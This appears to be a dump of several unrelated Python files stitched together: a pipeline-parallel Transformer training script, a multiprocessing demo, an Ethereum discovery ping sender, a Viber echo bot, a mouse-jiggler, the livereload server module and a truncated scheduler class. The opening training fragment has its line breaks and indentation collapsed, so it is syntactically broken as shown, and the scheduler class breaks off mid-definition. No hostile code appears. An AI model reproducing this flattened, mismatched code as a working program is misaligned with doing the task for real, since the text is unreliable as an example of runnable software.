optimizer.step() # receive and save grad if model.delay <= 0: grad = shm_lists[2*split_id+1].recv() if args.cuda: grad = grad.cuda(GPUS[split_id]) model.save_grad(grad) #print(split_id, ' receive grad from ', 2*(split_id)+1 , grad.norm()) # step-wise learning rate annealing train_step += 1 if args.scheduler in ['cosine', 'constant', 'dev_perf']: # linear warmup stage if train_step < args.warmup_step: curr_lr = args.lr * train_step / args.warmup_step optimizer.param_groups[0]['lr'] = curr_lr else: if args.scheduler == 'cosine': 
scheduler.step(train_step) elif args.scheduler == 'inv_sqrt': scheduler.step(train_step) if train_step % args.eval_interval == 0: model.eval() # If the model does not use memory at all, make the ext_len longer. # Otherwise, make the mem_len longer and keep the ext_len the same. if args.mem_len == 0: model.reset_length(args.eval_tgt_len, args.ext_len+args.tgt_len-args.eval_tgt_len, args.mem_len) else: model.reset_length(args.eval_tgt_len, args.ext_len, args.mem_len+args.tgt_len-args.eval_tgt_len) mems_eval = tuple() with torch.no_grad(): for batch in range(n_batch_val): # forward hidden = shm_lists_eval[2*(split_id-1)].recv() if args.cuda: hidden = hidden.cuda(GPUS[split_id]) hidden = Variable(hidden.data) ret = model.forward(hidden, *mems_eval) hidden, mems_eval = ret[0], ret[1:] shm_lists_eval[2*split_id].send(hidden.data.cpu()) # Switch back to the training mode model.reset_length(args.tgt_len, args.ext_len, args.mem_len) model.train() if train_step == args.max_step: break if train_step == args.max_step: break def train_begin_end(model, optimizer, tr_iter, va_iter, shm_lists, shm_lists_eval, split_id, scheduler, logging, args): model.cuda(GPUS[0]) # Turn on training mode which enables dropout. 
log_start_time = time.time() eval_start_time = time.time() train_step = 0 train_loss = 0 best_val_loss = None val_loss = 0 for epoch in itertools.count(start=1): model.train() mems_begin = tuple() mems_end = tuple() train_iter = tr_iter.get_varlen_iter() if args.varlen else tr_iter for batch, (data, target, seq_len) in enumerate(train_iter): if seq_len > args.tgt_len: data = data[0:args.tgt_len] target = target[0:args.tgt_len] else: while len(data) != args.tgt_len: data_copy_len = (args.tgt_len - len(data)) if (args.tgt_len - len(data) <= len(data)) else len(data) data = torch.cat([data, data[0:data_copy_len]], 0) target = torch.cat([target, target[0:data_copy_len]], 0) model.zero_grad() # forward begin with torch.no_grad(): ret = model.forward_begin(data, *mems_begin) hidden, mems_begin = ret[0], ret[1:] shm_lists[split_id*2].send(hidden.data.cpu()) #print(0, ' sent hidden to ', 2*(split_id) , hidden.norm()) # forward end hidden_end = shm_lists[2*(args.num_splits-1)].recv() if args.cuda: hidden = hidden_end.cuda(GPUS[0]) #print(args.num_splits, ' receive hidden from ', 2*(args.num_splits-1) , hidden.norm()) # backward end model.fr_backward_begin() hidden = Variable(hidden.data, requires_grad=True) ret = model.forward_end(hidden, target, *mems_end) loss, mems_end = ret[0], ret[1:] loss = loss.float().mean().type_as(loss) # backward end loss.backward() grad = model.get_grad_end() #shm_lists[2*(args.num_splits-1)+1].send(grad.cpu()) shm_lists[2*(args.num_splits-1)+1].send(hidden.grad.data.cpu()) #print(args.num_splits, ' send grad to ', 2*(args.num_splits-1)+1 , grad.norm()) train_loss += loss.float().item() torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip) optimizer.step() # receive and save grad if model.delay <= 0: grad = shm_lists[1].recv() if args.cuda: grad = grad.cuda(GPUS[0]) model.save_grad_begin(grad) #print(0, ' receive grad from ', 1 , grad.norm()) # step-wise learning rate annealing train_step += 1 if args.scheduler in ['cosine', 'constant', 
'dev_perf']: # linear warmup stage if train_step < args.warmup_step: curr_lr = args.lr * train_step / args.warmup_step optimizer.param_groups[0]['lr'] = curr_lr else: if args.scheduler == 'cosine': scheduler.step(train_step) elif args.scheduler == 'inv_sqrt': scheduler.step(train_step) if train_step % args.log_interval == 0: cur_loss = train_loss / args.log_interval elapsed = time.time() - log_start_time log_str = '| epoch {:3d} step {:>8d} | {:>6d} batches | lr {:.3g} ' \ '| ms/batch {:5.2f} | loss {:5.2f}'.format( epoch, train_step, batch+1, optimizer.param_groups[0]['lr'], elapsed * 1000 / args.log_interval, cur_loss) if args.dataset in ['enwik8', 'text8']: log_str += ' | bpc {:9.5f}'.format(cur_loss / math.log(2)) else: log_str += ' | ppl {:9.3f}'.format(math.exp(cur_loss)) logging(log_str) train_loss = 0 log_start_time = time.time() if train_step % args.eval_interval == 0: model.eval() # If the model does not use memory at all, make the ext_len longer. # Otherwise, make the mem_len longer and keep the ext_len the same. if args.mem_len == 0: model.reset_length(args.eval_tgt_len, args.ext_len+args.tgt_len-args.eval_tgt_len, args.mem_len) else: model.reset_length(args.eval_tgt_len, args.ext_len, args.mem_len+args.tgt_len-args.eval_tgt_len) mems_begin_eval = tuple() mems_end_eval = tuple() # Evaluation total_len, total_loss = 0, 0. 
with torch.no_grad(): for i, (data, target, seq_len) in enumerate(va_iter): if args.max_eval_steps > 0 and i >= args.max_eval_steps: break if seq_len > args.eval_tgt_len: data = data[0:args.eval_tgt_len] target = target[0:args.eval_tgt_len] else: while len(data) != args.eval_tgt_len: data_copy_len = (args.eval_tgt_len - len(data)) if (args.eval_tgt_len - len(data) <= len(data)) else len(data) data = torch.cat([data, data[0:data_copy_len]], 0) target = torch.cat([target, target[0:data_copy_len]], 0) ret = model.forward_begin(data, *mems_begin_eval) hidden, mems_begin_eval = ret[0], ret[1:] shm_lists_eval[split_id*2].send(hidden.data.cpu()) # forward end hidden_end = shm_lists_eval[2*(args.num_splits-1)].recv() if args.cuda: hidden = hidden_end.cuda(GPUS[0]) hidden = Variable(hidden.data) ret = model.forward_end(hidden, target, *mems_end_eval) loss, mems_end_eval = ret[0], ret[1:] loss = loss.mean() total_loss += seq_len * loss.float().item() total_len += seq_len # Switch back to the training mode model.reset_length(args.tgt_len, args.ext_len, args.mem_len) model.train() val_loss = total_loss / total_len logging('-' * 100) log_str = '| Eval {:3d} at step {:>8d} | time: {:5.2f}s ' \ '| valid loss {:5.2f}'.format( train_step // args.eval_interval, train_step, (time.time() - eval_start_time), val_loss) if args.dataset in ['enwik8', 'text8']: log_str += ' | bpc {:9.5f}'.format(val_loss / math.log(2)) else: log_str += ' | valid ppl {:9.3f}'.format(math.exp(val_loss)) logging(log_str) logging('-' * 100) # Save the model if the validation loss is the best we've seen so far. 
if not best_val_loss or val_loss < best_val_loss: if not args.debug: with open(os.path.join(args.work_dir, 'model_0.pt'), 'wb') as f: torch.save(model, f) with open(os.path.join(args.work_dir, 'optimizer_0.pt'), 'wb') as f: torch.save(optimizer.state_dict(), f) best_val_loss = val_loss # dev-performance based learning rate annealing if args.scheduler == 'dev_perf': scheduler.step(val_loss) eval_start_time = time.time() if train_step == args.max_step: break if train_step == args.max_step: break if __name__ == '__main__': try: mp.set_start_method('spawn') except RuntimeError: pass parser = argparse.ArgumentParser(description='PyTorch Transformer Language Model') parser.add_argument('--data', type=str, default='../data/wikitext-103', help='location of the data corpus') parser.add_argument('--dataset', type=str, default='wt103', choices=['wt103', 'lm1b', 'enwik8', 'text8'], help='dataset name') parser.add_argument('--num_splits', type=int, default=2, help='number of splits') parser.add_argument('--n_layer', type=int, default=12, help='number of total layers') parser.add_argument('--n_head', type=int, default=10, help='number of heads') parser.add_argument('--d_head', type=int, default=50, help='head dimension') parser.add_argument('--d_embed', type=int, default=-1, help='embedding dimension') parser.add_argument('--d_model', type=int, default=500, help='model dimension') parser.add_argument('--d_inner', type=int, default=1000, help='inner dimension in FF') parser.add_argument('--dropout', type=float, default=0.0, help='global dropout rate') parser.add_argument('--dropatt', type=float, default=0.0, help='attention probability dropout rate') parser.add_argument('--init', default='normal', type=str, help='parameter initializer to use.') parser.add_argument('--emb_init', default='normal', type=str, help='parameter initializer to use.') parser.add_argument('--init_range', type=float, default=0.1, help='parameters initialized by U(-init_range, init_range)') 
parser.add_argument('--emb_init_range', type=float, default=0.01, help='parameters initialized by U(-init_range, init_range)') parser.add_argument('--init_std', type=float, default=0.02, help='parameters initialized by N(0, init_std)') parser.add_argument('--proj_init_std', type=float, default=0.01, help='parameters initialized by N(0, init_std)') parser.add_argument('--optim', default='adam', type=str, choices=['adam', 'sgd', 'adagrad'], help='optimizer to use.') parser.add_argument('--lr', type=float, default=0.00025, help='initial learning rate (0.00025|5 for adam|sgd)') parser.add_argument('--mom', type=float, default=0.0, help='momentum for sgd') parser.add_argument('--scheduler', default='cosine', type=str, choices=['cosine', 'inv_sqrt', 'dev_perf', 'constant'], help='lr scheduler to use.') parser.add_argument('--warmup_step', type=int, default=0, help='upper epoch limit') parser.add_argument('--decay_rate', type=float, default=0.5, help='decay factor when ReduceLROnPlateau is used') parser.add_argument('--lr_min', type=float, default=0.0, help='minimum learning rate during annealing') parser.add_argument('--clip', type=float, default=0.25, help='gradient clipping') parser.add_argument('--clip_nonemb', action='store_true', help='only clip the gradient of non-embedding params') parser.add_argument('--max_step', type=int, default=100000, help='upper epoch limit') parser.add_argument('--batch_size', type=int, default=60, help='batch size') parser.add_argument('--batch_chunk', type=int, default=1, help='split batch into chunks to save memory') parser.add_argument('--tgt_len', type=int, default=70, help='number of tokens to predict') parser.add_argument('--eval_tgt_len', type=int, default=50, help='number of tokens to predict for evaluation') parser.add_argument('--ext_len', type=int, default=0, help='length of the extended context') parser.add_argument('--mem_len', type=int, default=0, help='length of the retained previous heads') 
parser.add_argument('--not_tied', action='store_true', help='do not tie the word embedding and softmax weights') parser.add_argument('--seed', type=int, default=1111, help='random seed') parser.add_argument('--cuda', action='store_true', help='use CUDA') parser.add_argument('--adaptive', action='store_true', help='use adaptive softmax') parser.add_argument('--div_val', type=int, default=1, help='divident value for adapative input and softmax') parser.add_argument('--pre_lnorm', action='store_true', help='apply LayerNorm to the input instead of the output') parser.add_argument('--varlen', action='store_true', help='use variable length') parser.add_argument('--multi_gpu', action='store_true', help='use multiple GPU') parser.add_argument('--log-interval', type=int, default=200, help='report interval') parser.add_argument('--eval-interval', type=int, default=4000, help='evaluation interval') parser.add_argument('--work_dir', default='LM-TFM', type=str, help='experiment directory.') parser.add_argument('--restart', action='store_true', help='restart training from the saved checkpoint') parser.add_argument('--restart_dir', type=str, default='', help='restart dir') parser.add_argument('--debug', action='store_true', help='run in debug mode (do not create exp dir)') parser.add_argument('--same_length', action='store_true', help='use the same attn length for all tokens') parser.add_argument('--attn_type', type=int, default=0, help='attention type. 
0 for ours, 1 for Shaw et al,' '2 for Vaswani et al, 3 for Al Rfou et al.') parser.add_argument('--clamp_len', type=int, default=-1, help='use the same pos embeddings after clamp_len') parser.add_argument('--eta_min', type=float, default=0.0, help='min learning rate for cosine scheduler') parser.add_argument('--gpu0_bsz', type=int, default=-1, help='batch size on gpu 0') parser.add_argument('--max_eval_steps', type=int, default=-1, help='max eval steps') parser.add_argument('--sample_softmax', type=int, default=-1, help='number of samples in sampled softmax') parser.add_argument('--patience', type=int, default=0, help='patience') parser.add_argument('--finetune_v2', action='store_true', help='finetune v2') parser.add_argument('--finetune_v3', action='store_true', help='finetune v3') parser.add_argument('--fp16', action='store_true', help='Run in pseudo-fp16 mode (fp16 storage fp32 math).') parser.add_argument('--static-loss-scale', type=float, default=1, help='Static loss scale, positive power of 2 values can ' 'improve fp16 convergence.') parser.add_argument('--dynamic-loss-scale', action='store_true', help='Use dynamic loss scaling. If supplied, this argument' ' supersedes --static-loss-scale.') args = parser.parse_args() args.tied = not args.not_tied if args.d_embed < 0: args.d_embed = args.d_model assert args.ext_len >= 0, 'extended context length must be non-negative' assert args.batch_size % args.batch_chunk == 0 args.work_dir = '{}-{}'.format(args.work_dir, args.dataset) args.work_dir = os.path.join(args.work_dir, time.strftime('%Y%m%d-%H%M%S')) logging = create_exp_dir(args.work_dir, scripts_to_save=['train.py', 'mem_transformer.py'], debug=args.debug) # Set the random seed manually for reproducibility. 
np.random.seed(args.seed) torch.manual_seed(args.seed) if torch.cuda.is_available(): if not args.cuda: print('WARNING: You have a CUDA device, so you should probably run with --cuda') else: torch.cuda.manual_seed_all(args.seed) # Validate `--fp16` option if args.fp16: if not args.cuda: print('WARNING: --fp16 requires --cuda, ignoring --fp16 option') args.fp16 = False else: try: from apex.fp16_utils import FP16_Optimizer except: print('WARNING: apex not installed, ignoring --fp16 option') args.fp16 = False main(args, logging)
example3.py
import multiprocessing as mp
import random
import string

random.seed(123)


def rand_string(length, output):
    """Generate a random string of numbers, lower- and uppercase chars,
    and put it on *output* (a multiprocessing queue)."""
    alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits
    generated = ''.join(random.choice(alphabet) for _ in range(length))
    output.put(generated)


def rand_string2(length):
    """Generate and return a random string of numbers, lower- and
    uppercase chars."""
    alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits
    return ''.join(random.choice(alphabet) for _ in range(length))


if __name__ == "__main__":
    # ================= Process =================
    print('Started')

    # Queue collecting one result per worker process.
    output = mp.Queue()

    # Four workers, each producing one 5-character string.
    processes = [mp.Process(target=rand_string, args=(5, output))
                 for _ in range(4)]

    for proc in processes:
        proc.start()
    for proc in processes:
        proc.join()

    # One result per launched process.
    results = [output.get() for _ in processes]
    print('Process results: ', results)

    # ================= Pool ======================
    pool = mp.Pool(processes=4)
    results = [pool.apply(rand_string2, args=(x, )) for x in range(1, 7)]
    print('Pool results: ', results)

    print('End')
main.py
import socket
import threading
import time
import struct
import rlp
from secp256k1 import PrivateKey
from ipaddress import ip_address
import hashlib
import _pysha3
import math


def keccak256(s):
    """Return the 32-byte keccak-256 digest of byte string *s*."""
    k = _pysha3.keccak_256()
    k.update(s)
    return k.digest()


class EndPoint(object):
    """A discovery endpoint: IP address plus UDP and TCP ports."""

    def __init__(self, address, udpPort, tcpPort):
        self.address = ip_address(address)
        self.udpPort = udpPort
        self.tcpPort = tcpPort

    def pack(self):
        """Return the RLP-ready list: packed IP, big-endian uint16 ports."""
        return [self.address.packed,
                struct.pack(">H", self.udpPort),
                struct.pack(">H", self.tcpPort)]


class PingNode(object):
    """Discovery ping packet (packet type 0x01, protocol version 3)."""

    packet_type = bytes([1])
    # NOTE(review): version is a str while packet_type is bytes; the rlp
    # encoder must accept text here — consider b'\x03' after confirming
    # the installed rlp version's behaviour.
    version = '\x03'

    def __init__(self, endpoint_from, endpoint_to):
        self.endpoint_from = endpoint_from
        self.endpoint_to = endpoint_to

    def pack(self):
        """Return [version, from-endpoint, to-endpoint, expiration] for RLP."""
        # Expiration is 60 seconds from now, as a big-endian uint32.
        return [self.version,
                self.endpoint_from.pack(),
                self.endpoint_to.pack(),
                struct.pack(">I", math.ceil(time.time()) + 60)]


class PingServer(object):
    """UDP server that signs and sends discovery pings from *my_endpoint*."""

    def __init__(self, my_endpoint):
        self.endpoint = my_endpoint

        # Load the node's serialized private key from disk; `with` guarantees
        # the file handle is closed even if deserialization fails.
        with open('priv_key', 'r') as priv_key_file:
            priv_key_serialized = priv_key_file.read()
        self.priv_key = PrivateKey()
        self.priv_key.deserialize(priv_key_serialized)

        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.sock.bind(('0.0.0.0', self.endpoint.udpPort))

    def wrap_packet(self, packet):
        """Build hash || signature || recovery-id || packet-type || rlp-payload."""
        payload = packet.packet_type + rlp.encode(packet.pack())
        sig = self.priv_key.ecdsa_sign_recoverable(keccak256(payload),
                                                   raw=True)
        sig_serialized = self.priv_key.ecdsa_recoverable_serialize(sig)
        # sig_serialized is (64-byte signature, recovery id). The recovery id
        # is a small int and must be appended as ONE byte; the previous
        # `bytes(sig_serialized[1])` built `recid` ZERO bytes instead,
        # corrupting every signed packet.
        payload = sig_serialized[0] + bytes([sig_serialized[1]]) + payload
        payload_hash = keccak256(payload)
        return payload_hash + payload

    def udp_listen(self):
        """Return an (unstarted) thread that receives one UDP datagram."""
        def receive_ping():
            print("listening...")
            data, addr = self.sock.recvfrom(1024)
            print("received message[", addr, "]")

        return threading.Thread(target=receive_ping)

    def ping(self, endpoint):
        """Sign and send a ping packet to *endpoint*."""
        ping = PingNode(self.endpoint, endpoint)
        message = self.wrap_packet(ping)
        print("sending ping.")
        self.sock.sendto(message, (endpoint.address.exploded, endpoint.udpPort))


my_endpoint = EndPoint(u'127.0.0.1', 30302, 30302)
their_endpoint = EndPoint(u'127.0.0.1', 30301, 30301)

server = PingServer(my_endpoint)

listen_thread = server.udp_listen()
listen_thread.start()

server.ping(their_endpoint)
sample_bot.py
from flask import Flask, request, Response
from viberbot import Api
from viberbot.api.bot_configuration import BotConfiguration
from viberbot.api.messages.text_message import TextMessage
from viberbot.api.viber_requests import ViberConversationStartedRequest
from viberbot.api.viber_requests import ViberFailedRequest
from viberbot.api.viber_requests import ViberMessageRequest
from viberbot.api.viber_requests import ViberSubscribedRequest
from viberbot.api.viber_requests import ViberUnsubscribedRequest

import time
import logging
import sched
import threading

logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)

app = Flask(__name__)
viber = Api(BotConfiguration(
    name='PythonSampleBot',
    avatar='http://viber.com/avatar.jpg',
    auth_token='YOUR_AUTH_TOKEN_HERE'
))


@app.route('/', methods=['POST'])
def incoming():
    """Viber webhook endpoint: echo messages; greet conversation-start,
    subscribe and unsubscribe events; log delivery failures.

    Always returns HTTP 200 so Viber does not retry the callback.
    """
    logger.debug("received request. post data: {0}".format(request.get_data()))
    viber_request = viber.parse_request(request.get_data().decode('utf8'))

    if isinstance(viber_request, ViberMessageRequest):
        # Echo the incoming message back to its sender.
        message = viber_request.message
        viber.send_messages(viber_request.sender.id, [
            message
        ])
    elif isinstance(viber_request, ViberConversationStartedRequest) \
            or isinstance(viber_request, ViberSubscribedRequest) \
            or isinstance(viber_request, ViberUnsubscribedRequest):
        # NOTE(review): these request types usually expose .user / .user_id
        # rather than .sender — verify against the installed viberbot
        # version before relying on this branch.
        viber.send_messages(viber_request.sender.id, [
            TextMessage(None, None, viber_request.get_event_type())
        ])
    elif isinstance(viber_request, ViberFailedRequest):
        # logger.warn() is deprecated; warning() is the supported spelling.
        logger.warning("client failed receiving message. failure: {0}".format(viber_request))

    return Response(status=200)


def set_webhook(viber):
    """Register this server's public HTTPS endpoint with Viber."""
    viber.set_webhook('https://mybotwebserver.com:8443/')


if __name__ == "__main__":
    # Viber rejects set_webhook until the server is reachable, so register
    # the webhook 5 seconds after startup from a background thread.
    scheduler = sched.scheduler(time.time, time.sleep)
    scheduler.enter(5, 1, set_webhook, (viber,))
    t = threading.Thread(target=scheduler.run)
    t.start()

    context = ('server.crt', 'server.key')
    app.run(host='0.0.0.0', port=8443, debug=True, ssl_context=context)
mousemover.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

__author__ = "luk6xff"
__date__ = "01.02.2022"

# Mouse and Keyboard controlers
from pynput.mouse import Controller as MouseController
from pynput.keyboard import Listener as KeyboardListener
# Sleep wait
from time import sleep
import threading
import random


class MouseMover():
    """Keep the pointer busy by jiggling it once a second.

    Keyboard control: 'p' resumes movement, 'w' pauses it, 'q' quits.
    """

    def __init__(self):
        self.mouse = MouseController()
        self.keyboard = KeyboardListener(on_press=self.on_press_key,
                                         on_release=self.on_release_key)
        self.app_running = True
        self.init_keyboard()
        self.init_mouse()

    def stop_mouse_running(self):
        """Pause the movement loop (pointer stays still)."""
        print("stop mouse_running")
        self.mouse_running = False

    def start_mouse_running(self):
        """Resume the movement loop."""
        print("start mouse_running")
        self.mouse_running = True

    def stop_all(self):
        """Terminate the application and the keyboard listener."""
        print("stopping all!")
        self.app_running = False
        self.keyboard.stop()

    def mouse_run(self):
        """Worker loop: nudge and scroll the pointer randomly every second."""
        bounds = (-10, 10)

        def jitter():
            return random.randint(bounds[0], bounds[1])

        while self.app_running:
            if self.mouse_running:
                # Move pointer relative to its current position ...
                self.mouse.move(jitter(), jitter())
                # ... and scroll a few random steps.
                self.mouse.scroll(jitter(), jitter())
            sleep(1)

    def on_press_key(self, key_name):
        """Dispatch a pressed key to its registered handler, if any."""
        try:
            key_name = str(key_name).strip('\'')
            handler = self.keys.get(key_name)
            if handler is not None:
                handler()
        except AttributeError:
            print("Special Key {} pressed".format(key_name))

    def on_release_key(self, key_name):
        """Key releases are observed but ignored."""
        key_name = str(key_name).strip('\'')

    def init_keyboard(self):
        """Register the key bindings and start the keyboard listener."""
        self.keys = {
            'p': self.start_mouse_running,
            'w': self.stop_mouse_running,
            'q': self.stop_all
        }
        self.keyboard.start()

    def init_mouse(self):
        """Start the mouse-jiggle thread and block until it finishes."""
        self.start_mouse_running()
        self.mouse_thread = threading.Thread(target=self.mouse_run)
        self.mouse_thread.start()
        self.mouse_thread.join()


if __name__ == "__main__":
    mm = MouseMover()
server.py
# -*- coding: utf-8 -*-
"""
    livereload.server
    ~~~~~~~~~~~~~~~~~

    WSGI app server for livereload.

    :copyright: (c) 2013 - 2015 by Hsiaoming Yang
    :license: BSD, see LICENSE for more details.
"""

import errno
import os
import time
import shlex
import logging
import threading
import webbrowser
from subprocess import Popen, PIPE
from tornado.wsgi import WSGIContainer
from tornado.ioloop import IOLoop
from tornado.autoreload import add_reload_hook
from tornado import web
from tornado import escape
from tornado import httputil
from tornado.log import LogFormatter
from .handlers import LiveReloadHandler, LiveReloadJSHandler
from .handlers import ForceReloadHandler, StaticFileHandler
from .watcher import get_watcher_class
from six import string_types, PY3

logger = logging.getLogger('livereload')

HEAD_END = b'</head>'


def shell(cmd, output=None, mode='w', cwd=None, shell=False):
    """Execute a shell command.

    You can add a shell command::

        server.watch(
            'style.less', shell('lessc style.less', output='style.css')
        )

    :param cmd: a shell command, string or list
    :param output: output stdout to the given file
    :param mode: only works with output, mode ``w`` means write,
                 mode ``a`` means append
    :param cwd: set working directory before command is executed.
    :param shell: if true, on Unix the executable argument specifies a
                  replacement shell for the default ``/bin/sh``.
    """
    if not output:
        output = os.devnull
    else:
        folder = os.path.dirname(output)
        if folder and not os.path.isdir(folder):
            os.makedirs(folder)
    if not isinstance(cmd, (list, tuple)) and not shell:
        cmd = shlex.split(cmd)

    def run_shell():
        try:
            p = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=PIPE, cwd=cwd,
                      shell=shell)
        except OSError as e:
            logger.error(e)
            # `os.errno` was an undocumented alias removed in modern Python;
            # the errno module is the supported way to get ENOENT.
            if e.errno == errno.ENOENT:  # file (command) not found
                logger.error("maybe you haven't installed %s", cmd[0])
            return e
        stdout, stderr = p.communicate()
        if stderr:
            logger.error(stderr)
            return stderr
        #: stdout is bytes, decode for python3
        if PY3:
            stdout = stdout.decode()
        with open(output, mode) as f:
            f.write(stdout)

    return run_shell


class LiveScriptInjector(web.OutputTransform):
    """Output transform that injects the livereload snippet before </head>.

    ``self.script`` is supplied by a subclass (see ``ConfiguredTransform``
    inside :meth:`Server.application`).
    """

    def __init__(self, request):
        super(LiveScriptInjector, self).__init__(request)

    def transform_first_chunk(self, status_code, headers, chunk, finishing):
        if HEAD_END in chunk:
            chunk = chunk.replace(HEAD_END, self.script + HEAD_END)
            # Keep Content-Length consistent with the enlarged body.
            if 'Content-Length' in headers:
                length = int(headers['Content-Length']) + len(self.script)
                headers['Content-Length'] = str(length)
        return status_code, headers, chunk


class LiveScriptContainer(WSGIContainer):
    """WSGI container that injects the livereload script into HTML bodies."""

    def __init__(self, wsgi_app, script=''):
        self.wsgi_app = wsgi_app
        self.script = script

    def __call__(self, request):
        data = {}
        response = []

        def start_response(status, response_headers, exc_info=None):
            data["status"] = status
            data["headers"] = response_headers
            return response.append

        app_response = self.wsgi_app(
            WSGIContainer.environ(request), start_response)
        try:
            response.extend(app_response)
            body = b"".join(response)
        finally:
            if hasattr(app_response, "close"):
                app_response.close()
        if not data:
            raise Exception("WSGI app did not call start_response")

        status_code, reason = data["status"].split(' ', 1)
        status_code = int(status_code)
        headers = data["headers"]
        header_set = set(k.lower() for (k, v) in headers)
        body = escape.utf8(body)
        if HEAD_END in body:
            body = body.replace(HEAD_END, self.script + HEAD_END)
        # 304 responses carry no body, so no body-describing headers.
        if status_code != 304:
            if "content-type" not in header_set:
                headers.append(("Content-Type",
                                "application/octet-stream; charset=UTF-8"))
            if "content-length" not in header_set:
                headers.append(("Content-Length", str(len(body))))
        if "server" not in header_set:
            headers.append(("Server", "LiveServer"))

        start_line = httputil.ResponseStartLine(
            "HTTP/1.1", status_code, reason
        )
        header_obj = httputil.HTTPHeaders()
        for key, value in headers:
            # The injected script may have grown the body after the app set
            # Content-Length; always emit the real length.
            if key.lower() == 'content-length':
                value = str(len(body))
            header_obj.add(key, value)
        request.connection.write_headers(start_line, header_obj, chunk=body)
        request.connection.finish()
        self._log(status_code, request)


class Server(object):
    """Livereload server interface.

    Initialize a server and watch file changes::

        server = Server(wsgi_app)
        server.serve()

    :param app: a wsgi application instance
    :param watcher: A Watcher instance, you don't have to initialize
                    it by yourself. Under Linux, you will want to install
                    pyinotify and use INotifyWatcher() to avoid wasted
                    CPU usage.
    """

    def __init__(self, app=None, watcher=None):
        self.root = None
        self.app = app
        if not watcher:
            watcher_cls = get_watcher_class()
            watcher = watcher_cls()
        self.watcher = watcher

    def watch(self, filepath, func=None, delay=None, ignore=None):
        """Add the given filepath for watcher list.

        Once you have intialized a server, watch file changes before
        serve the server::

            server.watch('static/*.stylus', 'make static')

            def alert():
                print('foo')
            server.watch('foo.txt', alert)
            server.serve()

        :param filepath: files to be watched, it can be a filepath,
                         a directory, or a glob pattern
        :param func: the function to be called, it can be a string of
                     shell command, or any callable object without
                     parameters
        :param delay: Delay sending the reload message. Use 'forever' to
                      not send it. This is useful to compile sass files to
                      css, but reload on changed css files then only.
        :param ignore: A function return True to ignore a certain pattern of
                       filepath.
        """
        if isinstance(func, string_types):
            cmd = func
            func = shell(func)
            func.repr_str = "shell: {}".format(cmd)
        elif func:
            func.repr_str = str(func)
        self.watcher.watch(filepath, func, delay, ignore=ignore)

    def application(self, port, host, liveport=None, debug=None,
                    live_css=True, override_port=None):
        LiveReloadHandler.watcher = self.watcher
        LiveReloadHandler.live_css = live_css
        if liveport is None:
            liveport = port
        client_port = override_port or liveport or port
        if debug is None and self.app:
            debug = True

        live_handlers = [
            (r'/livereload', LiveReloadHandler),
            (r'/forcereload', ForceReloadHandler),
            (r'/livereload.js', LiveReloadJSHandler)
        ]

        # The livereload.js snippet.
        # Uses JavaScript to dynamically inject the client's hostname.
        # This allows for serving on 0.0.0.0.
        live_reload_path = ":{port}/livereload.js?port={port}".format(
            port=client_port)
        if client_port == 80 or client_port == 443:
            live_reload_path = "/livereload.js?port={port}".format(
                port=client_port)
        live_script = escape.utf8((
            '<script type="text/javascript">'
            'document.write("<script src=''//"'
            ' + window.location.hostname + "{path}''>'
            ' </"+"script>");'
            '</script>'
        ).format(path=live_reload_path))

        web_handlers = self.get_web_handlers(live_script)

        class ConfiguredTransform(LiveScriptInjector):
            script = live_script

        if liveport == port:
            # Single application serves both content and livereload traffic.
            handlers = live_handlers + web_handlers
            app = web.Application(
                handlers=handlers,
                debug=debug,
                transforms=[ConfiguredTransform]
            )
            app.listen(port, address=host)
        else:
            # Separate livereload application on its own port.
            app = web.Application(
                handlers=web_handlers,
                debug=debug,
                transforms=[ConfiguredTransform]
            )
            app.listen(port, address=host)
            live = web.Application(handlers=live_handlers, debug=False)
            live.listen(liveport, address=host)

    def get_web_handlers(self, script):
        """Return handlers: wrap the WSGI app if present, else serve files."""
        if self.app:
            fallback = LiveScriptContainer(self.app, script)
            return [(r'.*', web.FallbackHandler, {'fallback': fallback})]
        return [
            (r'/(.*)', StaticFileHandler, {
                'path': self.root or '.',
                'default_filename': 'index.html',
            }),
        ]

    def serve(self, port=5500, liveport=None, host=None, root=None,
              debug=None, open_url=False, restart_delay=2,
              open_url_delay=None, live_css=True, override_port=None):
        """Start serve the server with the given port.

        :param port: serve on this port, default is 5500
        :param liveport: live reload on this port
        :param host: serve on this hostname, default is 127.0.0.1
        :param root: serve static on this root directory
        :param debug: set debug mode, which autoreloads the app on code
                      changes via Tornado (and causes polling). Defaults to
                      True when ``self.app`` is set, otherwise False.
        :param open_url_delay: open webbrowser after the delay seconds
        :param live_css: whether to use live css or force reload on css.
                         Defaults to True
        :param override_port: serving port is different from client-side
        """
        host = host or '127.0.0.1'
        if root is not None:
            self.root = root
        self._setup_logging()
        logger.info('Serving on http://%s:%s' % (host, port))
        self.application(port, host, liveport=liveport, debug=debug,
                         live_css=live_css, override_port=override_port)

        # Async open web browser after 5 sec timeout
        if open_url or open_url_delay:
            if open_url:
                # warn() is a deprecated alias of warning().
                logger.warning('Use `open_url_delay` instead of `open_url`')
            sleep = open_url_delay or 5

            def opener():
                time.sleep(sleep)
                webbrowser.open('http://%s:%s' % (host, port))
            threading.Thread(target=opener).start()

        try:
            self.watcher._changes.append(('__livereload__', restart_delay))
            LiveReloadHandler.start_tasks()
            add_reload_hook(lambda: IOLoop.instance().close(all_fds=True))
            IOLoop.instance().start()
        except KeyboardInterrupt:
            logger.info('Shutting down...')

    def _setup_logging(self):
        logger.setLevel(logging.INFO)

        channel = logging.StreamHandler()
        channel.setFormatter(LogFormatter())
        logger.addHandler(channel)

        # need a tornado logging handler to prevent IOLoop._setup_logging
        logging.getLogger('tornado').addHandler(channel)
scheduler.py
import time
import threading
import logging
import importlib

import schedule

log = logging.getLogger(__name__)
log.setLevel("DEBUG")


class Scheduler:
    """Create thread for scheduler to run"""

    def __init__(self, sequencer, config) -> None:
        self.sequencer = sequencer
        self.schedules = {}
        self.config = config
        self.active = False        # True once the background thread is running
        self.thread = None
        self._importSchedules()

    def getSchedules(self):
        """Return the raw schedule configuration."""
        return self.config

    def getActiveSchedules(self):
        """Return a mapping of schedule name -> its registered jobs."""
        return {name: sched.getJobs() for name, sched in self.schedules.items()}

    def start(self, schedule_name: str, function_name: str):
